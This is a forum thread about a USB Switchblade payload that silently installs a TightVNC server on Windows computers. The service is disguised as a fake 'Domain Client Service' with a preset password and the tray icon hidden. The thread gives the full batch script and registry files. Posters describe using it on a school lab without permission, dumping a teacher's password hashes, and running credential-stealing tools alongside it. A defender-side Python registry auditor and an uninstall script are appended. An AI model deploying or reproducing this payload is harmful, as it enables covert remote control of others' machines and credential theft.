NEW - my TightVNC Switchblade payload


kz26

I found that the VNC entry on the Switchblade wiki was too cumbersome to follow.

I did some research and was able to create a silent install package for the TightVNC server (see www.tightvnc.com).

The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL.

To create this payload:

1. Go to the TightVNC homepage above.

2. Download the no-install zip package.

3. In your switchblade\tools directory, create the folder "tvnc".

4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory.

5. Create "vnc.cmd" in your tools directory with the following code:

@echo off
REM Silent Install of TightVNC server
REM Install script by kz26

REM Part 1 - Copy server files
xcopy tvnc\winvnc.exe %systemroot% /c /y
xcopy tvnc\VNCHooks.dll %systemroot% /c /y

REM install phony WinVNC service and import reg settings
sc create winvnc binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
regedit.exe /s tvnc\reg1.reg
regedit.exe /s tvnc\reg2.reg

REM Start the VNC Service and have fun
net start winvnc

6. Create reg1.reg and reg2.reg in your "tvnc" directory.

Contents of reg1.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ORL]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\winvnc.exe]
"use_GetUpdateRect"=dword:00000001
"use_Timer"=dword:00000000
"use_KeyPress"=dword:00000001
"use_LButtonUp"=dword:00000001
"use_MButtonUp"=dword:00000001
"use_RButtonUp"=dword:00000001
"use_Deferral"=dword:00000001

Contents of reg2.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000000
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000001
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"QueryAccept"=dword:00000000
"QueryAllowNoPass"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000001
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

7. Add the following to your go.cmd file:

start /b .\vnc.cmd

------------

This payload will silently install the WinVNC service and disguise it as a "realistic" system service.

To connect: Use any VNC viewer to connect to the target.

Port: 8080

Username: N/A

password: hacked

I believe this payload is much more streamlined. Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people.

P.S. I use this to install VNC at my school's WinXP Pro computer lab.

Works great for pissing off unsuspecting people...


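As an added defender-side example (not part of kz26's payload or anything else in this thread): a small Python parser for .reg exports like reg2.reg above that decodes the WinVNC3 settings and reports the ones that matter when hunting for this footprint on a host. The sample text is a constructed excerpt of the posted reg2.reg, and the function names parse_reg and audit_winvnc are my own.

```python
import re

# Constructed sample: an excerpt of the reg2.reg posted above, not a real host export.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"LoopbackOnly"=dword:00000000
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"""

def parse_reg(text):
    """Parse a .reg export into {key_path: {name: value}}: dword -> int, hex -> bytes.
    Handles the single-line dword/hex values used in the thread (no continuation lines)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key = re.match(r'^\[(.+)\]$', line)
        if key:
            current = key.group(1)
            keys.setdefault(current, {})
            continue
        val = re.match(r'^"([^"]+)"=(dword|hex):(.+)$', line)
        if val and current is not None:
            name, kind, raw = val.groups()
            if kind == "dword":
                keys[current][name] = int(raw, 16)
            else:
                keys[current][name] = bytes(int(b, 16) for b in raw.split(","))
    return keys

def audit_winvnc(keys):
    """Return the WinVNC3 findings a defender wants from a parsed .reg (empty if none)."""
    base = next((k for k in keys if k.upper().endswith(r"\ORL\WINVNC3")), None)
    if base is None:
        return []
    srv, default = keys[base], keys.get(base + r"\Default", {})
    findings = [f"WinVNC3 server config present under {base}"]
    if srv.get("LoopbackOnly", 0) == 0:
        findings.append("LoopbackOnly=0: the server accepts connections from the network")
    if "PortNumber" in default:
        findings.append(f"RFB listener on TCP port {default['PortNumber']}")  # 0x1f90 = 8080
    if "Password" in default:
        # VNC stores the password with a fixed-key obfuscation, not a hash: anyone who can
        # read this key recovers the password, so treat the blob itself as the credential.
        findings.append("Password blob in registry: reversible VNC obfuscation, not a hash")
    return findings
```

Run against a live export (reg export "HKLM\SOFTWARE\ORL" dump.reg) the same two functions flag the listener port and the stored password of any TightVNC 1.3 server, not only the one posted here.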

Yeah, the students at our school are supposed to have limited accounts. However, I pwdumped a teacher's comp when they weren't there to get the local admin password.


Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue.

@echo off
REM TightVNC Server Antidote

REM Turn off the service
sc stop winvnc

REM Delete the service
sc delete winvnc

REM Delete the server files
del %systemroot%\winvnc.exe
del %systemroot%\VNCHooks.dll


  • 8 months later...
Hi, I'm getting an error when I run my go.cmd file: it says that the winvnc.exe and vnchooks.dll files cannot be found, even though they are in the same folder as the go.cmd file.

You need to put the winvnc.exe and vnchooks.dll files in a folder called "tvnc".


You said you used it at school; however, don't you then have a limited account and no access to regedit?

That's how it is at our school anyway...

Also, sometimes it is possible to get around that by using a 3rd party regedit.

I use RegAlyzer.

It's a fun & easy way to re-enable the run button in the start menu, cmd and some other things!

:D

USBHacker

PS: Can someone please put all the required files for this hack, into a zip (or some other archive format) and host it onto some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum? Thanks in advance, USBHacker


Is RegAlyzer portable, or do you have a portable version?

  • 2 weeks later...

Howdy all,

I always enjoy a new silent VNC server install via the USB Switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMD\tvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd.) My vnc.cmd code looks like this:

@echo off
REM Silent Install of TightVNC server
REM Script by kz26

REM Copy VNC Server Files
xcopy tvnc\winvnc.exe %systemroot% /c /y
xcopy tvnc\VNCHooks.dll %systemroot% /c /y

REM Install fake WinVNC service and import reg settings
sc create winvnc binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
regedit.exe /s tvnc\reg1.reg
regedit.exe /s tvnc\reg2.reg

REM Port: 8080
REM Username: N/A
REM Password: hacked
net start winvnc
:End
exit

These are my reg1.reg and reg2.reg files:

reg1.reg

Windows Registry Editor Version 5.00

; DisableTrayIcon written as a proper value under the WinVNC3 key (.reg syntax)
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"DisableTrayIcon"=dword:00000001

[HKEY_CURRENT_USER\Software\ORL]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs]

[HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\winvnc.exe]
"use_GetUpdateRect"=dword:00000001
"use_Timer"=dword:00000000
"use_KeyPress"=dword:00000001
"use_LButtonUp"=dword:00000001
"use_MButtonUp"=dword:00000001
"use_RButtonUp"=dword:00000001
"use_Deferral"=dword:00000001

reg2.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000000
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000001
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"QueryAccept"=dword:00000000
"QueryAllowNoPass"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000001
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

and finally, this is my go.cmd code that launches vnc.cmd:

@echo [START Silent WinVNC Server Install] >> Documents\logfiles\%computername%.log 2>&1
start /b .\vnc.cmd
@echo [End Silent WinVNC Server Install] >> Documents\logfiles\%computername%.log 2>&1
:End
exit

This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine.

Note: I added [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon?

- AndyzBong

